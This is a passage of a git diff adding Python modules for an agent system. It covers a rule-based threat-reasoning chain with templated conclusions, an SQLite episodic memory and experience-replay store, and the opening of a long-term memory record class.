conn.execute(""" + SELECT COUNT(*) FROM reasoning_steps WHERE chain_id = ? + """, (chain_id,)) + step_number = cursor.fetchone()[0] + 1 + + # Apply reasoning to generate conclusion + conclusion, confidence = self._apply_reasoning( + reasoning_type, premise, inference_rule, evidence or [] + ) + + step = ReasoningStep( + step_id=step_id, + step_number=step_number, + reasoning_type=reasoning_type, + premise=premise, + inference_rule=inference_rule or self._select_inference_rule(reasoning_type), + conclusion=conclusion, + confidence=confidence, + evidence=evidence or [], + assumptions=assumptions or [], + created_at=datetime.now() + ) + + # Store step in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO reasoning_steps ( + step_id, chain_id, step_number, reasoning_type, + premise, inference_rule, conclusion, confidence, + evidence, assumptions, created_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + step.step_id, chain_id, step.step_number, + step.reasoning_type.value, step.premise, + step.inference_rule, step.conclusion, + step.confidence, json.dumps(step.evidence), + json.dumps(step.assumptions), + step.created_at.isoformat() + )) + + logger.info(f"Added reasoning step {step_number} to chain {chain_id}") + return step_id + + except Exception as e: + logger.error(f"Error adding reasoning step: {e}") + return "" + + def complete_reasoning_chain(self, chain_id: str) -> Dict[str, Any]: + """Complete reasoning chain and generate final conclusion""" + try: + # Get all steps for this chain + steps = self._get_chain_steps(chain_id) + + if not steps: + return {'error': 'No reasoning steps found'} + + # Generate final conclusion by combining all steps + final_conclusion, overall_confidence = self._synthesize_conclusion(steps) + + # Update chain in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE reasoning_chains SET + final_conclusion = ?, + overall_confidence = ?, + completed_at = ?, + status = 'completed' + WHERE chain_id = ? + """, ( + final_conclusion, overall_confidence, + datetime.now().isoformat(), chain_id + )) + + result = { + 'chain_id': chain_id, + 'final_conclusion': final_conclusion, + 'overall_confidence': overall_confidence, + 'step_count': len(steps), + 'reasoning_quality': self._assess_reasoning_quality(steps) + } + + logger.info(f"Completed reasoning chain {chain_id}: {final_conclusion[:50]}...") + return result + + except Exception as e: + logger.error(f"Error completing reasoning chain: {e}") + return {'error': str(e)} + + def reason_about_threat(self, threat_indicators: List[str], + agent_id: str = "") -> Dict[str, Any]: + """Perform comprehensive threat reasoning using multiple reasoning types""" + try: + problem = f"Analyze threat indicators: {', '.join(threat_indicators[:3])}..." + + # Start reasoning chain + chain_id = self.start_reasoning_chain( + agent_id, problem, "threat_assessment", threat_indicators + ) + + reasoning_results = { + 'chain_id': chain_id, + 'threat_indicators': threat_indicators, + 'reasoning_steps': [], + 'threat_assessment': {}, + 'recommendations': [] + } + + # Step 1: Deductive reasoning - What do we know for certain? + known_facts = f"Observed indicators: {', '.join(threat_indicators)}" + step1_id = self.add_reasoning_step( + chain_id, ReasoningType.DEDUCTIVE, known_facts, + "indicator_classification", + evidence=threat_indicators + ) + + # Step 2: Inductive reasoning - Pattern recognition + pattern_premise = "Multiple indicators suggest coordinated activity" + step2_id = self.add_reasoning_step( + chain_id, ReasoningType.INDUCTIVE, pattern_premise, + "pattern_generalization", + evidence=[f"Indicator pattern analysis: {len(threat_indicators)} indicators"] + ) + + # Step 3: Abductive reasoning - Best explanation + explanation_premise = "Finding most likely explanation for observed indicators" + step3_id = self.add_reasoning_step( + chain_id, ReasoningType.ABDUCTIVE, explanation_premise, + "hypothesis_selection", + assumptions=["Indicators represent malicious activity"] + ) + + # Step 4: Causal reasoning - Impact analysis + impact_premise = "If threat is real, what are potential consequences?" + step4_id = self.add_reasoning_step( + chain_id, ReasoningType.CAUSAL, impact_premise, + "impact_analysis", + assumptions=["Current security controls", "System vulnerabilities"] + ) + + # Complete the reasoning chain + completion_result = self.complete_reasoning_chain(chain_id) + reasoning_results.update(completion_result) + + # Generate threat assessment based on reasoning + steps = self._get_chain_steps(chain_id) + avg_confidence = sum(step['confidence'] for step in steps) / len(steps) if steps else 0 + + if avg_confidence > 0.8: + threat_level = "HIGH" + priority = "immediate" + elif avg_confidence > 0.6: + threat_level = "MEDIUM" + priority = "elevated" + else: + threat_level = "LOW" + priority = "monitor" + + reasoning_results['threat_assessment'] = { + 'threat_level': threat_level, + 'priority': priority, + 'confidence': avg_confidence, + 'reasoning_quality': completion_result.get('reasoning_quality', 0.5) + } + + # Generate recommendations + recommendations = [ + { + 'action': 'investigate_indicators', + 'priority': 'high' if avg_confidence > 0.7 else 'medium', + 'rationale': 'Based on deductive analysis of indicators' + }, + { + 'action': 'monitor_systems', + 'priority': 'medium', + 'rationale': 'Based on causal impact analysis' + } + ] + + if threat_level == "HIGH": + recommendations.insert(0, { + 'action': 'activate_incident_response', + 'priority': 'critical', + 'rationale': 'High confidence threat detected through multi-step reasoning' + }) + + reasoning_results['recommendations'] = recommendations + + logger.info(f"Threat reasoning complete: {threat_level} threat (confidence: {avg_confidence:.3f})") + return reasoning_results + + except Exception as e: + logger.error(f"Error in threat reasoning: {e}") + return {'error': str(e)} + + def _apply_reasoning(self, reasoning_type: ReasoningType, premise: str, + inference_rule: str, evidence: List[str]) -> Tuple[str, float]: + """Apply specific reasoning type to generate conclusion""" + try: + base_confidence = 0.5 + + if reasoning_type == ReasoningType.DEDUCTIVE: + # Deductive: If premise is true and rule is valid, conclusion follows + conclusion = f"Therefore: {self._apply_deductive_rule(premise, inference_rule)}" + confidence = min(0.9, base_confidence + (len(evidence) * 0.1)) + + elif reasoning_type == ReasoningType.INDUCTIVE: + # Inductive: Generalize from specific observations + conclusion = f"Pattern suggests: {self._apply_inductive_rule(premise, evidence)}" + confidence = min(0.8, base_confidence + (len(evidence) * 0.05)) + + elif reasoning_type == ReasoningType.ABDUCTIVE: + # Abductive: Best explanation for observations + conclusion = f"Most likely explanation: {self._apply_abductive_rule(premise, evidence)}" + confidence = min(0.7, base_confidence + (len(evidence) * 0.08)) + + elif reasoning_type == ReasoningType.CAUSAL: + # Causal: Cause and effect relationships + conclusion = f"Causal inference: {self._apply_causal_rule(premise, evidence)}" + confidence = min(0.75, base_confidence + 0.2) + + elif reasoning_type == ReasoningType.STRATEGIC: + # Strategic: Goal-oriented reasoning + conclusion = f"Strategic conclusion: {self._apply_strategic_rule(premise)}" + confidence = min(0.8, base_confidence + 0.25) + + else: + # Default reasoning + conclusion = f"Conclusion based on {reasoning_type.value}: {premise}" + confidence = base_confidence + + return conclusion, confidence + + except Exception as e: + logger.error(f"Error applying reasoning: {e}") + return f"Unable to reason about: {premise}", 0.1 + + def _apply_deductive_rule(self, premise: str, rule: str) -> str: + """Apply deductive reasoning rule""" + if "indicators" in premise.lower(): + return "specific threat types can be identified from these indicators" + elif "malicious" in premise.lower(): + return "security response is warranted" + else: + return f"logical consequence follows from {premise[:30]}..." + + def _apply_inductive_rule(self, premise: str, evidence: List[str]) -> str: + """Apply inductive reasoning rule""" + if len(evidence) > 3: + return "systematic attack pattern likely in progress" + elif len(evidence) > 1: + return "coordinated threat activity possible" + else: + return "isolated incident or false positive" + + def _apply_abductive_rule(self, premise: str, evidence: List[str]) -> str: + """Apply abductive reasoning rule""" + if any("network" in str(e).lower() for e in evidence): + return "network-based attack scenario" + elif any("file" in str(e).lower() for e in evidence): + return "malware or file-based attack" + else: + return "unknown attack vector requiring investigation" + + def _apply_causal_rule(self, premise: str, evidence: List[str]) -> str: + """Apply causal reasoning rule""" + return "if threat is confirmed, system compromise and data exfiltration may occur" + + def _apply_strategic_rule(self, premise: str) -> str: + """Apply strategic reasoning rule""" + return "optimal response is to investigate thoroughly while maintaining operational security" + + def _select_inference_rule(self, reasoning_type: ReasoningType) -> str: + """Select appropriate inference rule for reasoning type""" + rule_map = { + ReasoningType.DEDUCTIVE: "modus_ponens", + ReasoningType.INDUCTIVE: "generalization", + ReasoningType.ABDUCTIVE: "inference_to_best_explanation", + ReasoningType.CAUSAL: "causal_inference", + ReasoningType.STRATEGIC: "means_ends_analysis" + } + return rule_map.get(reasoning_type, "default_inference") + + def _get_chain_steps(self, chain_id: str) -> List[Dict[str, Any]]: + """Get all steps for a reasoning chain""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM reasoning_steps + WHERE chain_id = ? + ORDER BY step_number + """, (chain_id,)) + + steps = [] + for row in cursor.fetchall(): + step = { + 'step_id': row[0], + 'step_number': row[2], + 'reasoning_type': row[3], + 'premise': row[4], + 'inference_rule': row[5], + 'conclusion': row[6], + 'confidence': row[7], + 'evidence': json.loads(row[8]) if row[8] else [], + 'assumptions': json.loads(row[9]) if row[9] else [] + } + steps.append(step) + + return steps + + except Exception as e: + logger.error(f"Error getting chain steps: {e}") + return [] + + def _synthesize_conclusion(self, steps: List[Dict[str, Any]]) -> Tuple[str, float]: + """Synthesize final conclusion from reasoning steps""" + if not steps: + return "No conclusion reached", 0.0 + + # Weight later steps more heavily + weighted_confidence = 0.0 + total_weight = 0.0 + + conclusions = [] + + for i, step in enumerate(steps): + weight = (i + 1) / len(steps) # Later steps have higher weight + weighted_confidence += step['confidence'] * weight + total_weight += weight + conclusions.append(step['conclusion']) + + final_confidence = weighted_confidence / total_weight if total_weight > 0 else 0.0 + + # Create synthesized conclusion + if len(conclusions) == 1: + final_conclusion = conclusions[0] + else: + final_conclusion = f"Multi-step analysis concludes: {conclusions[-1]}" + + return final_conclusion, final_confidence + + def _assess_reasoning_quality(self, steps: List[Dict[str, Any]]) -> float: + """Assess the quality of the reasoning chain""" + if not steps: + return 0.0 + + quality_score = 0.0 + + # Diversity of reasoning types (better) + reasoning_types = set(step['reasoning_type'] for step in steps) + diversity_score = min(len(reasoning_types) / 4.0, 1.0) # Max 4 types + + # Logical progression (each step builds on previous) + progression_score = 1.0 # Assume good progression + + # Evidence quality (more evidence is better) + avg_evidence = sum(len(step['evidence']) for step in steps) / len(steps) + evidence_score = min(avg_evidence / 3.0, 1.0) + + # Confidence consistency (not too variable) + confidences = [step['confidence'] for step in steps] + confidence_std = (max(confidences) - min(confidences)) if len(confidences) > 1 else 0 + consistency_score = max(0.0, 1.0 - confidence_std) + + quality_score = ( + diversity_score * 0.3 + + progression_score * 0.3 + + evidence_score * 0.2 + + consistency_score * 0.2 + ) + + return quality_score + + def _load_inference_rules(self) -> Dict[str, Any]: + """Load available inference rules""" + return { + 'modus_ponens': {'pattern': 'If P then Q; P; therefore Q', 'confidence': 0.9}, + 'generalization': {'pattern': 'Multiple instances of X; therefore X is common', 'confidence': 0.7}, + 'causal_inference': {'pattern': 'A precedes B; A and B correlated; A causes B', 'confidence': 0.6}, + 'best_explanation': {'pattern': 'X explains Y better than alternatives', 'confidence': 0.8} + } + + def _load_reasoning_patterns(self) -> Dict[str, Any]: + """Load common reasoning patterns""" + return { + 'threat_analysis': [ + ReasoningType.DEDUCTIVE, + ReasoningType.INDUCTIVE, + ReasoningType.ABDUCTIVE, + ReasoningType.CAUSAL + ], + 'vulnerability_assessment': [ + ReasoningType.DEDUCTIVE, + ReasoningType.STRATEGIC, + ReasoningType.CAUSAL + ] + } + + def get_reasoning_statistics(self) -> Dict[str, Any]: + """Get comprehensive reasoning system statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_chains") + stats['total_chains'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_steps") + stats['total_steps'] = cursor.fetchone()[0] + + # Reasoning type distribution + cursor = conn.execute(""" + SELECT reasoning_type, COUNT(*) + FROM reasoning_steps + GROUP BY reasoning_type + """) + stats['reasoning_types'] = dict(cursor.fetchall()) + + # Average confidence by reasoning type + cursor = conn.execute(""" + SELECT reasoning_type, AVG(confidence) + FROM reasoning_steps + GROUP BY reasoning_type + """) + stats['avg_confidence_by_type'] = dict(cursor.fetchall()) + + # Chain completion rate + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_chains WHERE status = 'completed'") + completed = cursor.fetchone()[0] + stats['completion_rate'] = completed / stats['total_chains'] if stats['total_chains'] > 0 else 0 + + return stats + + except Exception as e: + logger.error(f"Error getting reasoning statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['ChainOfThoughtReasoning', 'ReasoningChain', 'ReasoningStep', 'ReasoningType'] diff --git a/src/cognitive/episodic_memory.py b/src/cognitive/episodic_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..e666d36f3e89cef75dfe142d5572a6da1a26207d --- /dev/null +++ b/src/cognitive/episodic_memory.py @@ -0,0 +1,653 @@ +""" +Episodic Memory System for Experience Replay and Learning +Captures temporal sequences of agent experiences for learning +""" +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import pickle + +logger = logging.getLogger(__name__) + +@dataclass +class Episode: + """Individual episode with temporal sequence""" + id: str + agent_id: str + session_id: str + start_time: datetime + end_time: Optional[datetime] + episode_type: str # operation, training, evaluation, etc. + context: Dict[str, Any] + actions: List[Dict[str, Any]] + observations: List[Dict[str, Any]] + rewards: List[float] + outcome: Optional[str] + success: bool + metadata: Dict[str, Any] + +@dataclass +class ExperienceReplay: + """Experience replay record for learning""" + episode_id: str + replay_count: int + last_replayed: datetime + replay_effectiveness: float + learning_insights: List[str] + +class EpisodicMemorySystem: + """Advanced episodic memory with experience replay capabilities""" + + def __init__(self, db_path: str = "data/cognitive/episodic_memory.db"): + """Initialize episodic memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._active_episodes = {} + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS episodes ( + id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + session_id TEXT NOT NULL, + start_time TEXT NOT NULL, + end_time TEXT, + episode_type TEXT NOT NULL, + context TEXT, + actions TEXT, + observations TEXT, + rewards TEXT, + outcome TEXT, + success BOOLEAN, + metadata TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS experience_replay ( + id TEXT PRIMARY KEY, + episode_id TEXT, + replay_count INTEGER DEFAULT 0, + last_replayed TEXT, + replay_effectiveness REAL DEFAULT 0.0, + learning_insights TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (episode_id) REFERENCES episodes(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS episode_patterns ( + id TEXT PRIMARY KEY, + pattern_type TEXT, + pattern_description TEXT, + episodes TEXT, + frequency INTEGER, + success_rate REAL, + discovered_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_agent_episodes ON episodes(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_type ON episodes(episode_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_success ON episodes(success)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_start_time ON episodes(start_time)") + + def start_episode(self, agent_id: str, session_id: str, + episode_type: str, context: Dict[str, Any] = None) -> str: + """Start a new episode recording""" + try: + episode_id = str(uuid.uuid4()) + + episode = Episode( + id=episode_id, + agent_id=agent_id, + session_id=session_id, + start_time=datetime.now(), + end_time=None, + episode_type=episode_type, + context=context or {}, + actions=[], + observations=[], + rewards=[], + outcome=None, + success=False, + metadata={} + ) + + self._active_episodes[episode_id] = episode + + # Store initial episode data + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO episodes ( + id, agent_id, session_id, start_time, episode_type, + context, actions, observations, rewards, success, metadata + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + episode.id, episode.agent_id, episode.session_id, + episode.start_time.isoformat(), episode.episode_type, + json.dumps(episode.context), json.dumps(episode.actions), + json.dumps(episode.observations), json.dumps(episode.rewards), + episode.success, json.dumps(episode.metadata) + )) + + logger.info(f"Started episode {episode_id} for agent {agent_id}") + return episode_id + + except Exception as e: + logger.error(f"Error starting episode: {e}") + return "" + + def record_action(self, episode_id: str, action: Dict[str, Any]): + """Record an action in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + action['timestamp'] = datetime.now().isoformat() + episode.actions.append(action) + + logger.debug(f"Recorded action in episode {episode_id}: {action.get('type', 'unknown')}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording action: {e}") + + def record_observation(self, episode_id: str, observation: Dict[str, Any]): + """Record an observation in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + observation['timestamp'] = datetime.now().isoformat() + episode.observations.append(observation) + + logger.debug(f"Recorded observation in episode {episode_id}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording observation: {e}") + + def record_reward(self, episode_id: str, reward: float): + """Record a reward signal in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + episode.rewards.append(reward) + + logger.debug(f"Recorded reward in episode {episode_id}: {reward}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording reward: {e}") + + def end_episode(self, episode_id: str, success: bool = False, + outcome: str = "", metadata: Dict[str, Any] = None): + """End an episode and store final results""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + episode.end_time = datetime.now() + episode.success = success + episode.outcome = outcome + if metadata: + episode.metadata.update(metadata) + + # Update database with final episode data + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE episodes SET + end_time = ?, actions = ?, observations = ?, + rewards = ?, outcome = ?, success = ?, metadata = ? + WHERE id = ? + """, ( + episode.end_time.isoformat(), + json.dumps(episode.actions), + json.dumps(episode.observations), + json.dumps(episode.rewards), + episode.outcome, + episode.success, + json.dumps(episode.metadata), + episode_id + )) + + # Create experience replay record + self._create_replay_record(episode_id) + + # Remove from active episodes + del self._active_episodes[episode_id] + + logger.info(f"Ended episode {episode_id}: success={success}, outcome={outcome}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error ending episode: {e}") + + def get_episodes_for_replay(self, agent_id: str = "", episode_type: str = "", + success_only: bool = False, limit: int = 10) -> List[Episode]: + """Get episodes suitable for experience replay""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if agent_id: + conditions.append("agent_id = ?") + params.append(agent_id) + + if episode_type: + conditions.append("episode_type = ?") + params.append(episode_type) + + if success_only: + conditions.append("success = 1") + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM episodes + WHERE {where_clause} AND end_time IS NOT NULL + ORDER BY start_time DESC + LIMIT ? + """, params + [limit]) + + episodes = [] + for row in cursor.fetchall(): + episode = Episode( + id=row[0], + agent_id=row[1], + session_id=row[2], + start_time=datetime.fromisoformat(row[3]), + end_time=datetime.fromisoformat(row[4]) if row[4] else None, + episode_type=row[5], + context=json.loads(row[6]) if row[6] else {}, + actions=json.loads(row[7]) if row[7] else [], + observations=json.loads(row[8]) if row[8] else [], + rewards=json.loads(row[9]) if row[9] else [], + outcome=row[10], + success=bool(row[11]), + metadata=json.loads(row[12]) if row[12] else {} + ) + episodes.append(episode) + + logger.info(f"Retrieved {len(episodes)} episodes for replay") + return episodes + + except Exception as e: + logger.error(f"Error getting episodes for replay: {e}") + return [] + + def replay_experience(self, episode_id: str) -> Dict[str, Any]: + """Replay an episode and extract learning insights""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute("SELECT * FROM episodes WHERE id = ?", (episode_id,)) + row = cursor.fetchone() + + if not row: + return {'error': 'Episode not found'} + + episode = Episode( + id=row[0], + agent_id=row[1], + session_id=row[2], + start_time=datetime.fromisoformat(row[3]), + end_time=datetime.fromisoformat(row[4]) if row[4] else None, + episode_type=row[5], + context=json.loads(row[6]) if row[6] else {}, + actions=json.loads(row[7]) if row[7] else [], + observations=json.loads(row[8]) if row[8] else [], + rewards=json.loads(row[9]) if row[9] else [], + outcome=row[10], + success=bool(row[11]), + metadata=json.loads(row[12]) if row[12] else {} + ) + + # Analyze episode for learning insights + insights = self._analyze_episode_for_insights(episode) + + # Update replay statistics + self._update_replay_stats(episode_id, insights) + + logger.info(f"Replayed episode {episode_id} with {len(insights)} insights") + return { + 'episode': episode, + 'insights': insights, + 'replay_time': datetime.now().isoformat() + } + + except Exception as e: + logger.error(f"Error replaying experience: {e}") + return {'error': str(e)} + + def discover_patterns(self) -> Dict[str, Any]: + """Discover patterns across episodes""" + try: + with sqlite3.connect(self.db_path) as conn: + # Get all completed episodes + cursor = conn.execute(""" + SELECT * FROM episodes + WHERE end_time IS NOT NULL + ORDER BY start_time + """) + + episodes = cursor.fetchall() + patterns = { + 'action_patterns': self._discover_action_patterns(episodes), + 'success_patterns': self._discover_success_patterns(episodes), + 'temporal_patterns': self._discover_temporal_patterns(episodes), + 'agent_patterns': self._discover_agent_patterns(episodes) + } + + # Store discovered patterns + for pattern_type, pattern_list in patterns.items(): + for pattern in pattern_list: + self._store_pattern(pattern_type, pattern) + + logger.info(f"Discovered patterns: {sum(len(p) for p in patterns.values())} total") + return patterns + + except Exception as e: + logger.error(f"Error discovering patterns: {e}") + return {'error': str(e)} + + def _create_replay_record(self, episode_id: str): + """Create experience replay record""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO experience_replay (id, episode_id, last_replayed) + VALUES (?, ?, ?) + """, (str(uuid.uuid4()), episode_id, datetime.now().isoformat())) + + except Exception as e: + logger.error(f"Error creating replay record: {e}") + + def _analyze_episode_for_insights(self, episode: Episode) -> List[str]: + """Analyze episode and extract learning insights""" + insights = [] + + try: + # Action sequence analysis + if len(episode.actions) > 1: + action_types = [a.get('type', 'unknown') for a in episode.actions] + unique_actions = len(set(action_types)) + insights.append(f"Used {unique_actions} different action types in sequence") + + # Reward trajectory analysis + if episode.rewards: + total_reward = sum(episode.rewards) + avg_reward = total_reward / len(episode.rewards) + insights.append(f"Average reward per step: {avg_reward:.3f}") + + # Reward trend + if len(episode.rewards) > 2: + if episode.rewards[-1] > episode.rewards[0]: + insights.append("Improving performance throughout episode") + else: + insights.append("Declining performance throughout episode") + + # Success factor analysis + if episode.success: + insights.append(f"Success achieved with {len(episode.actions)} actions") + if episode.outcome: + insights.append(f"Success outcome: {episode.outcome}") + else: + insights.append(f"Failed after {len(episode.actions)} actions") + if episode.outcome: + insights.append(f"Failure reason: {episode.outcome}") + + # Context relevance + if episode.context: + context_keys = list(episode.context.keys()) + insights.append(f"Context factors: {', '.join(context_keys[:3])}") + + except Exception as e: + logger.error(f"Error analyzing episode insights: {e}") + insights.append(f"Analysis error: {str(e)}") + + return insights + + def _update_replay_stats(self, episode_id: str, insights: List[str]): + """Update replay statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + # Calculate effectiveness based on insights + effectiveness = min(len(insights) / 10.0, 1.0) # Scale to 0-1 + + conn.execute(""" + UPDATE experience_replay SET + replay_count = replay_count + 1, + last_replayed = ?, + replay_effectiveness = ?, + learning_insights = ? + WHERE episode_id = ? + """, ( + datetime.now().isoformat(), + effectiveness, + json.dumps(insights), + episode_id + )) + + except Exception as e: + logger.error(f"Error updating replay stats: {e}") + + def _discover_action_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover common action patterns""" + patterns = [] + action_sequences = {} + + for episode in episodes: + if episode[7]: # actions column + actions = json.loads(episode[7]) + action_types = [a.get('type', 'unknown') for a in actions] + + # Look for sequences of length 2-4 + for seq_len in range(2, min(5, len(action_types) + 1)): + for i in range(len(action_types) - seq_len + 1): + sequence = tuple(action_types[i:i + seq_len]) + if sequence not in action_sequences: + action_sequences[sequence] = {'count': 0, 'success_count': 0} + action_sequences[sequence]['count'] += 1 + if episode[11]: # success column + action_sequences[sequence]['success_count'] += 1 + + # Convert to patterns + for sequence, stats in action_sequences.items(): + if stats['count'] >= 3: # Minimum frequency + success_rate = stats['success_count'] / stats['count'] + patterns.append({ + 'pattern': ' -> '.join(sequence), + 'frequency': stats['count'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['frequency'], reverse=True) + + def _discover_success_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover patterns that lead to success""" + patterns = [] + success_factors = {} + + for episode in episodes: + # Analyze context factors for all episodes + if episode[6]: # context column + context = json.loads(episode[6]) + for key, value in context.items(): + factor_key = f"{key}={value}" + if factor_key not in success_factors: + success_factors[factor_key] = {'success': 0, 'total': 0} + success_factors[factor_key]['total'] += 1 + if episode[11]: # success column + success_factors[factor_key]['success'] += 1 + + # Convert to patterns + for factor, stats in success_factors.items(): + if stats['total'] >= 3: # Minimum frequency + success_rate = stats['success'] / stats['total'] if stats['total'] > 0 else 0 + if success_rate > 0.7: # High success rate threshold + patterns.append({ + 'pattern': f"Context factor: {factor}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['success_rate'], reverse=True) + + def _discover_temporal_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover temporal patterns in episodes""" + patterns = [] + + # Group episodes by hour of day + hour_stats = {} + for episode in episodes: + start_time = datetime.fromisoformat(episode[3]) + hour = start_time.hour + + if hour not in hour_stats: + hour_stats[hour] = {'total': 0, 'success': 0} + + hour_stats[hour]['total'] += 1 + if episode[11]: # success column + hour_stats[hour]['success'] += 1 + + # Find patterns + for hour, stats in hour_stats.items(): + if stats['total'] >= 2: # Minimum episodes + success_rate = stats['success'] / stats['total'] + patterns.append({ + 'pattern': f"Episodes at hour {hour}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['frequency'], reverse=True) + + def _discover_agent_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover agent-specific patterns""" + patterns = [] + agent_stats = {} + + for episode in episodes: + agent_id = episode[1] # agent_id column + episode_type = episode[5] # episode_type column + + key = f"{agent_id}:{episode_type}" + if key not in agent_stats: + agent_stats[key] = {'total': 0, 'success': 0} + + agent_stats[key]['total'] += 1 + if episode[11]: # success column + agent_stats[key]['success'] += 1 + + # Convert to patterns + for key, stats in agent_stats.items(): + if stats['total'] >= 3: # Minimum episodes + success_rate = stats['success'] / stats['total'] + patterns.append({ + 'pattern': f"Agent pattern: {key}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['success_rate'], reverse=True) + + def _store_pattern(self, pattern_type: str, pattern: Dict[str, Any]): + """Store discovered pattern""" + try: + pattern_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO episode_patterns ( + id, pattern_type, pattern_description, + frequency, success_rate + ) VALUES (?, ?, ?, ?, ?) + """, ( + pattern_id, pattern_type, pattern['pattern'], + pattern['frequency'], pattern['success_rate'] + )) + + except Exception as e: + logger.error(f"Error storing pattern: {e}") + + def get_episodic_statistics(self) -> Dict[str, Any]: + """Get comprehensive episodic memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic episode counts + cursor = conn.execute("SELECT COUNT(*) FROM episodes") + stats['total_episodes'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM episodes WHERE success = 1") + stats['successful_episodes'] = cursor.fetchone()[0] + + # Episode type distribution + cursor = conn.execute(""" + SELECT episode_type, COUNT(*), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) as successes + FROM episodes + GROUP BY episode_type + """) + + episode_types = {} + for row in cursor.fetchall(): + episode_types[row[0]] = { + 'total': row[1], + 'successes': row[2], + 'success_rate': row[2] / row[1] if row[1] > 0 else 0 + } + stats['episode_types'] = episode_types + + # Agent performance + cursor = conn.execute(""" + SELECT agent_id, COUNT(*), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) as successes + FROM episodes + GROUP BY agent_id + """) + + agent_performance = {} + for row in cursor.fetchall(): + agent_performance[row[0]] = { + 'total_episodes': row[1], + 'successes': row[2], + 'success_rate': row[2] / row[1] if row[1] > 0 else 0 + } + stats['agent_performance'] = agent_performance + + # Replay statistics + cursor = conn.execute("SELECT COUNT(*) FROM experience_replay") + stats['total_replays'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT AVG(replay_effectiveness) FROM experience_replay") + avg_effectiveness = cursor.fetchone()[0] + stats['average_replay_effectiveness'] = avg_effectiveness or 0.0 + + # Pattern discovery + cursor = conn.execute("SELECT COUNT(*) FROM episode_patterns") + stats['discovered_patterns'] = cursor.fetchone()[0] + + return stats + + except Exception as e: + logger.error(f"Error getting episodic statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['EpisodicMemorySystem', 'Episode', 'ExperienceReplay'] diff --git a/src/cognitive/long_term_memory.py b/src/cognitive/long_term_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..ddd9430ad9d38f9ddfbf1ab5f97bd2be9d947c1b --- /dev/null +++ b/src/cognitive/long_term_memory.py @@ -0,0 +1,427 @@ +""" +Advanced Long-term Memory Architecture for Persistent Agent Memory +Implements cross-session memory persistence with intelligent retrieval +""" +import sqlite3 +import json +import hashlib +import numpy as np +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path + +logger = logging.getLogger(__name__) + +@dataclass +class MemoryRecord: + """Individual memory record with metadata""" + id: str + content: str + memory_type: str # episodic, semantic, procedural, strategic + timestamp: datetime + importance: float + access_count: int + last_accessed: datetime + embedding: Optional[List[float]] = None + tags: List[str] = None + agent_id: str = "" + 